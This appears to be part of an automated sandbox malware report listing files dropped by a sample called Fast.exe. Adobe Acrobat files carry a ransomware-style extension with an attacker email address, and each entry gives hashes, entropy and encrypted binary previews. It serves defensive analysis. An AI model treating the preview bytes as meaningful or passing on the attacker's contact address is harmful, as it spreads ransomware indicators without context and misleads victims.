    Preview:..-.eg"#.......o......).n....P...........$.np..Z.s.3....7...~......+...!.-.j.:......M.d/8.'...>.4..5Y....Z...t.<D.m!;x.S..* ......&..-J.9.p.../f..U.2W........v(..B..*.'.&.B.eO..._k..1...P.-..:.... ....zwY...8~UD.h.f.i#...N.d..0....OB.k..c.LP.K.`......0$.1$y*.g.D..ra..{...Im ..]......f.I.!....V0..U....k#.. .'R$c.....%L..K{.S..%.8".8...:...h.&,.X.<......O...\".f..8:O..B.F........Ug6.....f./. f.<....m......k.=.......(...y..PL.....d...#.../...E....p.r&..#.h.kcP8..q.H..8/....Ktv..+.$.1...:.....I....c....3K..{P.7R.g.R...}m.....<...(....,.5.w.~:.D.:3a.0bK....U].....eA......_.l.......Ff..=....z?.O .1o......]....zCr.o(.s.Wf|.....o..o...\M9.~.cw8.s..........1....M~4S.&...V......"...u.%-..Z..g]k$i.E._.$....%.VP..V;..j.E....x.n.EF[6.@....i..`..8.]A....N.m8V.... .'M";.l%Z....%.^..@....D.....Q.."n&..l.F.)%..);.:.........Z..`.....K...mX/....R.8....Zn..X...~2._k9N.U..P^ .?~..O..i._Hb9d/U.n.0...,.d....>.;.v...z.k5Ol..2....s8b...$..5..`B.....H....CN...Pk..

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.986015178008093
    Encrypted:false
    SSDEEP:384:5Q5te64cAtu2WWwaAKtFeY3apJtiHXAqB+DN4neLMNzxQ:mGvcUpWWlyJY3AqB2N4CK1Q
    MD5:F606C1C70D74BDB29160D53E1A099736
    SHA1:ADFA71586655D436D14EE08C09E1A675A5CA9F2E
    SHA-256:0C6629C8E3C7383CE947949418B764807D7D9DDC972223420C82F4CFA37583E3
    SHA-512:FBB6D2E6DB39E5C9B799BA5C2803C751B53EB2394CB7991654B239B7EAB8D6D9B420D53C3B3D1525253181E22D9BD4BE1A2BF96B48C8D4CCEF78AF10AE10B44E
    Malicious:false
    Preview:.3.......B.....k..+t...I....*.D.c.gLM+(....#......v%.i..biv.O..^;.6..*n......s'.<.I...Z.1.<..a.4.|u.E.H......*P..Vz........<.d..3|..>.q4.s..n..].F".;...~....).;..DI[[....A;kT.....b..&1.(..F|D.....Ns.).~.l...0..?..A'..1.w.d.l&J.n.VqI...y.../6zn..^..-1:....x.;.s......2..{.fs..'t..A..{.7.r....`[.B....&.%W..3rf/,._.tg3W...}..[.-..'...(...s.v.{#}....P6.k7.y&.........vr.8.>...4z...j...>.d......H..U.WC...O*KK.#..=2e.i...^F.4.....}.. R3"_......S.".....J.._....z.4~..Fi....f6.79..'.=.$.4.s<....^....<g.n.i#..~D.l..]...9m...6.w.h...GW.. jS5...hq...y .. ....e....r...._@~.!..<..C...o.].e...(L@...!2.*.......(.........U%..Y..0.......t.R.....";.6...bd...7&x+c... u.SO....zw..@.@.R....&.....E.....8...k.Y....<. ..4.4..$R.....e7.....8..Rb...4{o...h..RVX.X.z.o.TM...[......i....k5.K+...G.-)..x.q9..)..(`...S......?..X:...\.W.<?.........9IX...g...Zf;3.&...>d....v...B......k...*:>.u...." D.f.6.CT..*B:M...{jS. .......>S........5.1.....~...r}.Q..........

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):723170
    Entropy (8bit):7.999703103970478
    Encrypted:true
    SSDEEP:12288:JG3I9PZfpQvFHBVG5qeXft27O5GwoEP6pM3hhf+XGS74am8DD:kY9BfWvFmxvtr4wrP6G/4G/K
    MD5:1D04C7A2E9BC10ED54FD23C001EA2748
    SHA1:8E011A1DC618EA7469C32E6843FAFC8EBDB4FD01
    SHA-256:2CC63E29100505C77F9D13BA2EF82151C6E652736C69D71DDF5F4358E4D2E65E
    SHA-512:BD707AB445793897474376FC9506AEE1B014645BF01F41FB495D2796547D0722A17CDBB55C3E23807FF07D7ADAD3C13068E9AAF8D725B5BA9A5F443325685402
    Malicious:true
    Preview:ic.Q.RW.%.A'.z.t.1..M..%.I2.5l.. ...E.....R.....()-.\eg..\i/.J'.<9....a@'G3.'.5k.Z.Dd?.`...?..m+.;....*.....\......_.A.z......\x.I...us...,v..)3.i..5...J............e....ZG..... .y2/a.}.d-....MD.Xp[.@./....g..Q.....d..8...N.....<&........f.!..Qb.)......L.:.. -...0..!.*.xi..mbo..f..O..M.'.{.nK..x..x0.9.".....a..A.ta...B;T....S`...b.1..l..uB..E>.\t..m..=.....S...c.C.5.MB:e;U..s8.....5.}-.th.kk<..Hs...@...,^.2g.D|$.a....L..l.....~rW..!.Fl.Olc 6...h.T&.a.lDk+....c.&Vl....?o8 .a..;.d%...b..)...O*{d.b..j.l!,..?.8.4n..l....@......fm4.}.hO.c.K.....7Y.....J.^ 7b.........}.T..q.i+..[.s].?...]l..L{....C....z.......f&......\ 6..4W...p....:..&..6.L.P."...[Lb....W.}p..Et....E?.5..Nk....[Z.....C.{......c..j.k.G[....9.a.?r.........F..JI......la.s..hU...|.A..."U....jh...%j^.) .]...=.M.ND.W...M.x..:q....p}.M.....2..Ik^.YE..J.6.`.lK..x...(*.1S*..8s)...2.';.|..9.!.X.)B...C...U.W..T..lw.)Qd.W..D.!.0.9.6..y..PC...Z....s.S.f-Ou.|...m..#t..R"9..~.c[p..l|.. .dE.v~.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4989666
    Entropy (8bit):5.951355808114282
    Encrypted:false
    SSDEEP:49152:pZhlPMtYgEMf0i8P/O3O6SQkknVI2EHuhv5UqHI1mbzF7+uMvtcgky7Rrn+QlZO4:jPU7aHA/M8y7RFZOSbwvzpw
    MD5:1453ADF2FD3E7A9E08E841A5A3899AAD
    SHA1:D698BB5BBDA35017D8CD660B0E2013E66C3BA203
    SHA-256:5CF68DE95E6E9176353F7B628309F59E2C78A463F1BB75F8C3F9A3A799519CEA
    SHA-512:86D8F43766E9D67BEC8EDB50CF6D001616CE3A5FE53308A5C59149D7570042E9C460258F49DE29DD3DBA415857E400029131B9A28FF8A9FD891E15FA10204271
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):370
    Entropy (8bit):7.265873434547784
    Encrypted:false
    SSDEEP:6:FIYh1HojIBt+5oa5bh9BwXRtzWizzQtCf1/FKxRdE8dTbw/8HBjeig34emu0/jg:ma1qZ39BiL6iHQCf9FKxpbwaBm39Kjg
    MD5:EB4BC5D351C25E8E860F3C084FCFFBC4
    SHA1:11070B1C393273ABAEA8DFC10B55BE9E41FBE32A
    SHA-256:8C1FE130ED49C63564DA35B6ABA434E4364F9E92B9C3455C0313DB0820AB3066
    SHA-512:A335D14D4977946BE9774492E2F45CFE1700FF684CA392E681188E5643C7B929C83B607D40DCB0CA509FF3331FCED0C04F252233C6053E1052D60A09841C10AC
    Malicious:false
    Preview:..=.hP...r..X....*.T.<?.;8..b.0....M".......:..&v.7..+........dx..nu.h.kOd..R.F.h..h...{..G....E."t....L.Oc].2..+(X.....Ob.....>n...s...i.w..G.P..L......m.......:.g...}...{...........................#..5..U...V.T......I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):843986
    Entropy (8bit):7.9997739524845235
    Encrypted:true
    SSDEEP:24576:qB26d605CHBiHMFoeNi65qvwKLTR3PdxQ1tB8aUa0/7LbvWJ03qeddj:mCHBi0oe952DLTtPC8Ra0/3bOJ03qedJ
    MD5:2491C895204107D7F0347F164BB60870
    SHA1:BDF47F8B9CC454AB40DED0EB3ED9A2A18806F2C0
    SHA-256:D37B739027BACB5CD799DB7C927979860B27B8D8F31092C783629CA87C0D635F
    SHA-512:6E0862C2181F046E46248C8677FC77D2229790B8B959A80F685653A20D77F17471383F041DBFD867CF438C398509AF89C8614F23A3530089746B56F77F6448A8
    Malicious:true
    Preview:..m.|..;.....I>.6X.~.6B......j!......i.%...s.IN...y..h{....N......f!t4...5_.*t.u-..D.R.Y..=... ..9.*.i..d.Z...5>..L......*HB09....qG..w...T,I.K:.!.4.5....E..!m..;..Z....yC.D.,.94"W..\.OD.-..W...f.[.......L/.iw.c&..J.z.|b.@'.........s].prn.e...x....[<Ne.HK.(..Um=]<... ...A."p....R...r..3.....a.j...w..r'.G.I......D5e.......:*d.v. _.E\...7.,.jz.T....m...p.n|.... ..J?.k.c-.u..E..<.J...g..M.e.2..H........y'\P 3..v6/.#8......o,.....wX...}^.m...~_.\..)e....E.#s...6..d4..............y....~.>..S....j.#=..u......T#0.o.Y..%$F@y.^...5..V.....".b.%.............[.:.[k....g...K&w...X/7..`..u.$....6b.o.*.......4.\...6M...t.#.*1.5"..QD....a.'p...o.8T..dK....}.1...2.y..........dW.^0..i.G......Y ]...9..b.T..o.R.....<.6..-..m.Z..x._.xJ.-$.......4...........1.tI@. -..\..h.J......:.m.!*d..r1B9g.f...........ITe.%.....Y..Jh...............(..ES.vL/..?......V..(..F...x......u7..(...]..#..L>.:LL....e9z....Y..D.b.I....mz.G|..RDxk(G./.sF..E......A.p ..C$..,

    C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):63449818
    Entropy (8bit):6.436911847526764
    Encrypted:false
    SSDEEP:393216:8DOG5ixtbHFWDwTvaSngHbDjR0/SSK5wgZox0dVzS3tL19PudDzLF9WoLJO4Nf0x:4ixtbHvCGjMwgoxoHLF9RNybdQeGtE
    MD5:E7A820F0F424F69FAB25F1BCEBB1FF50
    SHA1:C6F954254B89D8036B33FB46B38D9AD671E1A937
    SHA-256:272052D9CE876BE94D1AD3A92EEC7FCA9C92C29B42CCB574A8BC9AFE8053CFF8
    SHA-512:BEA0106E703101EC254F6367BBEF243EF3503DCE03C1C46112002297E2FA8472FBBB8594B3BFB6EE29CBBE6CDE0B56EE43E762947894688AA2539BE8D588865E
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6427866
    Entropy (8bit):5.979429264560192
    Encrypted:false
    SSDEEP:49152:sDpasot2xQevgjCGT7lmPIionqOgB66zVLkVEk3yV07U24GEQTXvnSPgHosyhB8N:r9KXxLk6GEQTXCUKzNDqS7Xnaogowzx
    MD5:7F4272F7CAA5031C4B07D40874E6425B
    SHA1:314B067126069ED8E3ABEE109E7CA341FC7B0CD7
    SHA-256:33F54F9FDF30628C499D5D7764B5087FCA78E132A96F55F13D5DFBC8E2C138ED
    SHA-512:652578417A5C363D919228F3D78B09C2E4D62D168966A5541A358B8AA98FFC5C251785846B14C560BFB224EE9B1E9E98A2F3A1E566E1A8F329FC25890AF9908F
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):38098
    Entropy (8bit):7.995069545175516
    Encrypted:true
    SSDEEP:768:CZNTl2HN4Xskgxnf/7qdASCq1FIk3rYyIdK/xaam9Ox3MzuKQ:b0skKguq1SRyIiaF9M3muKQ
    MD5:3CAC91A77B2F34ABB4BCF521F705295F
    SHA1:BEAD4D92DA9EEDBFED8BAD39FA3253424F2D03AB
    SHA-256:DF88472627232F945298239F7BE0B658B6A05AE029096E40FD538A05D8D98B0E
    SHA-512:44BDC4FD2ED77B905BB11896B1D52ED20B5C0BF1FC5B3ACC846D562B226730D1510A0D140C42E4624043C8759ED2719DC5D2215D68AE9BB5C7F00329D17A4648
    Malicious:true
    Preview:V.$...kX.(.J....&...&'`.....ZPB.=W..0...n..eA...F..56....).spX../..D..J....A.7..J.._y..1Ofo...7....r9....1}.......2...[.5.#qr[_G...[{NM..C........G)..E......+.9n....t.....N.4.}...].S....x.D....~..v>.,{(k..TywL.Y.q..)...Z.C.(h..Pu...e..+.......2)Z..vZ...R....y....5V)Q.r|...._...4,]?n.,.,:....CE67_.. ..:..6o.....J..,.../.I!.y.&fU2?Qj.M1.G....>./[`(..V'm..He.BV.?#.S..x....d.jwKo~+....dMt.O?d....qH..8z...K.,......._.....x.GGBs.W....Z..k....|..w...AW...9.q$.`...1G@._2]4...bk....w.)....^....PfX\...Vy(....iz..T.].;L...S..m.\....8......7..e.v....-3.7.....K..)P.i.F.......%#...T...5..j.TQ.1....{..6......5l`.....=k...<b. .. DzU)h.~...`b.;6E....`.....L...z.>..c.>..M./A..}.o...&.B...6f..X........oq..I.'.l. J......>......VV5..L.M...,............L`.e,j....y...g..S..E-....s...b............X._.lmQ..8>..I<pq..bQ.....^.._.k.=t+Q.....%*#...h0.>)...fL....+.'Z..i.Z.I.9w..2}.~.Ah.d..O..lt..8}j. N.ra..:...z]?a.l.V........r....{..'.....l..](..L.6s0.e..S.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatRes.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):19413738
    Entropy (8bit):7.3529351495456
    Encrypted:false
    SSDEEP:196608:58IPbmmLjUK/8HWzt8mQ9IShtSqFEFnoTybF2iGgrAfK4aL:CInPkWzt8V9ISh4o2J25fVQ
    MD5:9700DD4AB44F91A3E21ACAF87111B453
    SHA1:350AB069A708362377FF66437B70EFB8536BCBBC
    SHA-256:D5119A3041555F3C72F39FCA6AC800AEF6FB95DF070DA436A080D8D3DE21A355
    SHA-512:0FF651FF7E2302A1FBB967D0DEC9AC1D4B70E03BEAF99B3B80AF6399E797025329AF7309BAD7766EA2A84E2CAA78E7E5002614EDE68579258703DA73586C176D
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):67234
    Entropy (8bit):7.997105009985587
    Encrypted:true
    SSDEEP:1536:TZoJT0U1kVjukZxaXhPDgzxq4yLb1LDaeOew3npm2z86VPXQ:TZoJgVjukZxa16xq4sb1383Y2Y6VvQ
    MD5:02F522160E610707046D3530216EFA63
    SHA1:41F46D16E5430346D07EF3F48E0FF1281F7FBCD8
    SHA-256:5B17A768DD4AB9CDE2DC0603B7450DED691319A8D2819960C7356F4A1D10FEE6
    SHA-512:3069816DC6DA3C3DD95A41E6F94D8E1423497F8850CD09F0A57A4D7ED05B751B29DAA4C8CF5A50FA43752DF8146DBB781F9FF4E1C2BD872DAA67237469E62219
    Malicious:true
    Preview:...Z..!6..+P.....]e...=.$O.R.j....D/...o.W..S.&..`Wo....9.E.Y.......m.t.J...F,...~..$G.+..pS7.JVE....nZ.I..V:..T"cK..F.O.z..!Q!W.".O-.Y....0../..g.v....1.9.f.v.].#..P..n...........H..S^M...w.....A..,.w.o..R...BK[......../+....\l...?..*.m.-..I..:.."4$../.f.._.I.H.....vc..(..T).@...@.&..d.q..xP..fm...6.D<.m.h.B..g.5=.9....?4.*.l....S..(!...x.:.......4.1./..S1..[...[...n@Z...9..=...L........,......#1g.......|.r.D.......\...}_......jF]._>Z).g^....`.......>(I@".K.Lw..w...j..,{...$.y..;.qz.]...G>.:...m.A.............[........Da.xzt....,*..Is.D5`.3.....\....J..h..s..8.xH....Cw*..4..=.3.b....K..R*.e..>/.gC...*.w Io3...pD..N.5g.R...G.hr.N.h....oq.f....A....2f8.bB.Ok.4Y...X..y...a.. ...T>.M,.[M....".5P]..d*...4...3*......|.QY7.+....B....q{N...l.>'Q.a...#l.......6..c.NQU..wF.....=Q..:..c..%...5....../[g.....A=......4u..G..a.BZ.`..H..D...<....)...s...(....G+.uM.......^....m.".$.....Gi.....}.....P....n\ ...'.IzT......I..H.Q......L..dWfz...~...I....Z.~.u.;.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_reader_appicon_16.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):658
    Entropy (8bit):7.568945530823676
    Encrypted:false
    SSDEEP:12:2B56ACEg/mDcyGYZbIRMND1wb1Uhe6mlVgcV90oyl1U0GbwaBm39Z:2DgsIYlIyNJSU8F3gM0oyl1NKYZ
    MD5:D121DA7C21792F1DFBEB0E58A234B71A
    SHA1:E98BEAC3463176B2E63BF68CBE5D7871F968A9FF
    SHA-256:95DC969CC761A659F600E0DAFDF85CF0BBC31D0D49AFC1060B13C910C8C4F09E
    SHA-512:E104C1CD4A1DF51FBFF8A7AA0C021594241432F90AE5853149B5ABA763836B1AC64AD921A2102CC9E761580C43FF1D71C1A0EE7D3264A5B40A919A355B6A9987
    Malicious:false
    Preview:...H...o.8.6.b....T...x.|...).]p.%.L..y.m..YKb.-.q>.fx(+.u....@./...,...5.J...2.'".........pr..b.....{.78....C.F].o..MJ..Z!....x......a..Y.....u.1}N......^......$.tr.....t.v;{........-....0!..6.<...;.iW.8.B..?.2RY.b;...o.l82l............r<C...y.....!..1{..]!..2.)H....a..D.:'=d.'m.....TDE>D1..s.'. /...b..%....o....^..$.)....6._.....a]..k.+N.B}.A...U.<.G.....v...:............KE._.<..u..3...E3.SL.iU.Y.* n.c.<.W...z.~4.+(p..:...n(.%..*.D.NE...4&.<d.K....]..i`t..........................%S.2bQ.{D......I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Secret Key
    Category:dropped
    Size (bytes):42706
    Entropy (8bit):7.995636369283413
    Encrypted:true
    SSDEEP:768:vPxgIGOU7Cpnb0fw9lVcyV2w4DTl3e2LK0Jlww3z+cbnAemLv/F9ShScyWIZYPCp:XxeCpnkslVcyoweu2O0rwwD+fT71WIZj
    MD5:972CDF1A6237A6499E25F62CE24BA02C
    SHA1:B5BB86206CDE691F2FD1C0CE0CE7400B371971F3
    SHA-256:2A387BBADADBD991820F95F61126F8B696E4B80E4DFA72DA9CD3C6C44B285BC3
    SHA-512:BAB1ED7028803DF24B9357A7FB5317367230F7B22EB6E6B362B2E28C019AE1B02206E9970C8EBAB3C414D76219B9B77D2C6736387F12AD97CE9285DC935FEADE
    Malicious:true
    Preview:...3`d..tnlG..2./....D&`-.e...K.....A..Zq....f...d.....;..E0:..$..#k..Y..Jl...=....4...C.AH.*.&.+b"w'.E.....|*.3.-..-j.db...8+d..VF..h.=.3W..S~..z..D.H.j.._n(z../.........1.. 0.q.2`..s8....=N2.x......qp..m.....F b... /A..V..\....Zn.j....\e.'..g....f.y8...R.=eUI....q=.@[..p.....n%...c. .._].....Ez..d....;..z.v..D....h..T5"..1. ..P9ha. 8o.W..,.e1..l..Dmv....j.g.S..}..K.].,f.F6..j*..Z .k2.I.g./.........;.C.....M..).G.. ..(.,_...7.?.z...\.+...{.....1*..?..V....K..2...9.D.R..'./.U.Y.Y.....md.P.<..f........G.. .5..&AJ-+...P.9..M^......,...Vr.L..k8......}.%.9?. ...S%..E.F{..%E...Q.-|L._...n....F]rV-..;........%....>..?.J..f..:o......OMR.7... ...e.p.^....^].BAr{\;<L9........(~j'.}$.C.$...r.i#.B..m..^=..AIj#..8......5g.ze..@Q0s*....Z<........7n..{..|;/..s. .k.^.........Q..T...uw..>...H.do.1...,....T.n..._ .#F.Vbs........\...15.....J....?.b...{.....<..)h.X...7O..ui........tR....j.8..4L.i.IU.]..=....&..T=..q....Xd.Y..N..h..}e..9.!.....vo.W........vM

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4368602
    Entropy (8bit):5.716704282680897
    Encrypted:false
    SSDEEP:49152:cC0nNc/RcYHCY9AwqdHIEogMAYrukdUmSC+bXMZQU1QqpqAMfJG+sqCbMNNmU2bk:iEIzHIEWOlANqLNNmU2bKd
    MD5:C4CFD637796F48181218C30D2A48A786
    SHA1:E19FCFCCB226E2E75E59B60934F95E779A562E13
    SHA-256:C485260137AAEC25F25342742F52A91FD6AF764B11CB41CC9BE9F5D1EE1DF601
    SHA-512:BC2ACC5C7E37E4AA99387DCC1ECA747A1B12BFB9BDE0B61E5C05A4BA041DA27317D66CE9CB2B834B2109C785E58B3A999EF6334BA1B4C4FC83ECE65B44E751E4
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):27298
    Entropy (8bit):7.9943410527205625
    Encrypted:true
    SSDEEP:768:7Fwt9RWZ3qG59w83qGS4EdU89nLywYHPQfevJ:76QbqGS4Eq81YvmevJ
    MD5:4D2A030E35144BCD6B46C6D6C3EAE512
    SHA1:BB94C82454F7BD45A3CB1FF83387132C5DF7E478
    SHA-256:BD18BCBFD9693BA04E9ED9A97E01A39D85B6FF96A096AFA992F24D092A2BD7F8
    SHA-512:DD48C146755AE548BDB3ED39A735A1DDCC2B0D7620959BC220A555FBEE172199D34ADA4A984C36612EFB95C7767B82A44F308B90B23702BE25F49A3393C74A76
    Malicious:true
    Preview:.....-.....~....dA..YL...4....^.aG...h..-........i..ke.....S$.0.h&..#..2...t.....R.z.q.=h.(...Z.....8.u...E.....gX.....g......M.;...nC.j.y..........zu..G....._>....G.....b....8..../[........2..v...h........kF..o|.X.K.X.%<.y....%.C"y.^8Y..s%..a.v...h8;.$i.L ....J....+<?..|..r.S..8.K...ea..X.....@P...Q^.Uc.X.W,...+S.{...1...V..q*iTG.,..2'U...n.M...a.MF.p...d....D.Lp..C.7g.nIFq..r.s~.g..M.0.=._w....FH5.%.?..i.w..(...U...p..}.......guOM.p....Q....X.......Y..m..r..O_.8.}.0.....U6..cS......~..MfU..SWI......V.P`y.>.%c[&C.p.....<.e....l.9.CG.F..SB.....ZW...M..@..&U...C6.b;.21M.5}.f..n....s......+...c/d.N.V.nWm....V.C(......A.'P.....q..>.E...[2...<....c.1...h..GO....6...............\..)..m....:..|..d8.=..\(..$...I;....[...y...kB!.]..xJ.P.AF.NM.>.5....l5|.C.....V..]3y].H.F.z..Y8!.....@q......1.. .Q.Ws...)WR]f"W.5.B..3+..q...R.Y;..p_.....v...3?)j.x.}M.....CM'.....}.....=P..f.L.V.s..;..}?.Q.u.e......:..brp.Pb.W.p.........s..^{...?..F.%....Wi..b......

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1938
    Entropy (8bit):7.8958403376788
    Encrypted:false
    SSDEEP:48:T61Aic7S4c1LKyBTzx7y3AajvI28offHQ8OfE8DZQ:T6Jh4csyhVy+28AHIfdQ
    MD5:E199C779FFBF3054B9FAE0AA696057C2
    SHA1:8F2D4460920315A6D831FB2A415B5B76E845CBC9
    SHA-256:74081A339B5524B33C7EF5EA525E19837D932E73969F068584F7A9D9B29FA3E0
    SHA-512:8673BCD6FB69C80D4C681F54ACD7E6B8852DAFC5475C31F2FF458BC42B8D96DECEB2C444A237669E2EF0346691B5067D29D8130597D78C0A65D28329788BE7F5
    Malicious:false
    Preview:.h.L.^D.>h9..u..wzI......yY.s]..K...6..l..D..%B/..z...-..].I.8..wA...._...u..&...).....T.@.v..V.]..6.....pL..UW.c.to.....J..K...rBW(@?.YT-..AN p.c6J.{...n.6{".......$..r.g.{hkcc:^..U.Lk...CX.Bj.......Y.....a\|.w.`.8.q...)7h./.......0a.e..%.SvJ{.......81.$.MDI..#d..Z...Z...5@...8kkW[M..w%..*..N.q..s@.G..l.~.jY.\2c#@.'D.!..:.[.bq....B...4...<g(..*...+.W..6:...f.O^..F.b...{.Q...hd.i.T4}v.\g.>...0.F..>.8".....7....6......C6.i#8.F[...I.g:8.a..D...?{..F....m.+.Fg...]....1I..s...\..)~@^...A3..`.Y8.Tb1....t..=*.Py.......t....;h.....Y..a..F28w...4.3.v....l]y_.6Vth../.^.nc.].*.H.v.a.......t{.n.S%..E.....Mv4K..V.M..K..X*.2Y)).2...Q..=.].....N.!...d...K.G..z..v....1..e.e..s........u[$......".....^./.S@...io}.%....rk.....-}.J......;.''..y..}..p..31w.._(..S.. ...j.....C_.......n.7.]~...d.._xu.I...On....N'L.....i......T...m..@*\........o.R.`......n..&GTR.Fp..V.@.e.:.Rt..&^.W.2....V.Q..a".._a.L.X.R....q.[...f.m....<.r_b......n.ZG.d/QP.=.12^W.....Q.&....._..O...U.;.q.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):60160266
    Entropy (8bit):7.980080643287468
    Encrypted:false
    SSDEEP:1572864:/Qb5m2CYw2bheyHA2DiAaNqCPiQwm9tqGWS15Vj9QVqd2+NAs6:IXhwMhe6AAaPiQwF6xQ22R/
    MD5:33B746B3C4C4BDFA030B5EC2AE9E2325
    SHA1:BF7E51777D860CD9A2F4A7B1FE9FCC149D75B633
    SHA-256:8A2BDEECA37C9C15DEE3C6689855432ABA16C8C399A2FC4C9C99730D306E9D67
    SHA-512:86D0D33857D47E630FC652DB99D2B513D43E1C1D7C9620F528B00BA2912597EFFBE15352E967295DDD91492F83615C4281F0154E6D7CC38DD6E99DD09EA864CA
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):614866
    Entropy (8bit):7.999676046735325
    Encrypted:true
    SSDEEP:12288:i6qQsbs29Ib84PJ8MNC1uyAKo5taTSqBIXuGd6m7uS4XrRKeT:iksb+dPJ3NC1uyAKo5DqBKuGcm7OXrR1
    MD5:BBEB8F7E4AA2A233D545367F1D6A4F7A
    SHA1:A924C40FF12F05927977CE9C417D469E9C984580
    SHA-256:7D68CC39E3BA9CD3607DE9FD6B9CDBA3CA4AB38FFFABC6236E306A2A93079CA4
    SHA-512:846AC7F5B19DCE73539D9555476B8231E13FAF7E119C80D38BDD527CDA66564438720AD7DD9FE9823730172CDDEA88004B335FD9D2B89C877838D695792CCC3D
    Malicious:true
